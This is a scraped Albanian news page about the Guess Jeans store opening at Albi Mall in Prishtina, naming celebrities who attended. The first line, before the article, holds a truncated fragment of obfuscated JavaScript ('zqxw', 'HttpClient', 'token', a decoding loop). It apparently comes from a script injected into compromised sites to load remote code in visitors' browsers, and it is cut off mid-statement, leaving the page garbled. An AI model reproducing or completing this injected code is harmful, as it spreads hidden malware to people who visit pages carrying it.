;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Guess Jeans Kosova mbledh VIP-at në një vend!

By

Të enjten e 14 nëntorit, qendrës tregtare Albi Mall iu shtua një dyqan i ri dhe tejet ekskluziv.

Bëhet fjalë për Guess Jeans Kosova, që solli në Prishtinë brendin ndërkombëtar të modës, Guess Jeans, duke shënuar kështu një moment historik për tregun e modës në vend .

Me këtë hap, Guess jo vetëm që forcon praninë e saj në rajon, por gjithashtu ofron një mundësi të shkëlqyer për ata që duan të shprehin stilin e tyre të veçantë përmes produkteve të një brendi të njohur ndërkombëtarisht.

Në hapjen festive të Guess Jeans Kosova, të pranishëm ishin personalitete të ndryshme nga bota e modës dhe biznesit, të cilët përshëndetën praninë e Guess në tregun kosovar. Kur jemi tek ta, pos plot personazheve, aty nuk munguan as Kader Kicaj, Diona Fona, Festa Cocaj e Eriona Sejdiu.

Atmosfera ishte në nivel, dhe të ftuarit po e shijonin festën e organizuar, me muzikë, ushqim e pije, derisa patën rastin që nga afër t’i shpalosin koleksionet.

Dyqani i Guess, i ndodhur në një nga hapësirat më atraktive të Albi Mall në katin e 2, ofron një përvojë blerjeje unike, me koleksione të reja të xhinseve dhe veshjeve për burra dhe gra, si dhe aksesorë që janë bërë pjesë e stilit të jetës së çdo adhuruesi të modës.

Kuptoni më shumë detaje duke ndjekur video materialin e mëposhtëm.

 

Artikuj të ngjashëm